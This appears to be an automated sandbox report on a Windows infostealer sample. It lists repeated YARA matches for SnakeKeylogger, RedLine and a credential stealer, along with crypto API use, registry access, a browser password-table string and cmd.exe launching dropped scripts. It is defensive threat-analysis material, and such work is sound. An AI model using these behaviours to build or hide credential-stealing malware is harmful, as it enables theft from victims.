            Source: 5.3.daphpvwO.pif.268f6d60.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.3.daphpvwO.pif.268f6d60.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.daphpvwO.pif.2aec0000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.daphpvwO.pif.2aec0000.9.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.1.daphpvwO.pif.438038.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 5.2.daphpvwO.pif.438038.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.ja811MqV4h.exe.212705a8.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.daphpvwO.pif.298e6458.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.daphpvwO.pif.298e6458.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.daphpvwO.pif.298e5570.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.daphpvwO.pif.298e5570.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.daphpvwO.pif.28600ca6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.daphpvwO.pif.28600ca6.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.daphpvwO.pif.28880ee8.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.daphpvwO.pif.28880ee8.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.daphpvwO.pif.28880000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.daphpvwO.pif.28880000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.daphpvwO.pif.2990e990.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.daphpvwO.pif.2990e990.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.daphpvwO.pif.28601b8e.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.daphpvwO.pif.28601b8e.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.daphpvwO.pif.298e5570.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.daphpvwO.pif.298e5570.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.daphpvwO.pif.28880000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.daphpvwO.pif.28880000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.daphpvwO.pif.28600ca6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.daphpvwO.pif.28600ca6.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.ja811MqV4h.exe.210c6e48.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000005.00000001.1321974377.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000005.00000002.3812458119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: daphpvwO.pif PID: 8816, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/4@3/3
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029C793C GetDiskFreeSpaceA,0_2_029C793C
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,5_2_004019F0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,5_2_004019F0
            Source: C:\Users\user\Desktop\ja811MqV4h.exeFile created: C:\Users\All Users\6556.cmdJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8764:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8728:120:WilError_03
            Source: C:\Users\user\Links\daphpvwO.pifCommand line argument: 08A5_2_00413780
            Source: C:\Users\user\Links\daphpvwO.pifCommand line argument: 08A5_2_00413780
            Source: C:\Users\user\Links\daphpvwO.pifCommand line argument: 08A5_1_00413780
            Source: C:\Users\user\Desktop\ja811MqV4h.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: daphpvwO.pif, 00000005.00000002.3833108807.000000002995E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: ja811MqV4h.exeVirustotal: Detection: 54%
            Source: ja811MqV4h.exeReversingLabs: Detection: 68%
            Source: C:\Users\user\Desktop\ja811MqV4h.exeFile read: C:\Users\user\Desktop\ja811MqV4h.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\ja811MqV4h.exe "C:\Users\user\Desktop\ja811MqV4h.exe"
            Source: C:\Users\user\Desktop\ja811MqV4h.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\6556.cmd""
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\ja811MqV4h.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\33809.cmd""
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
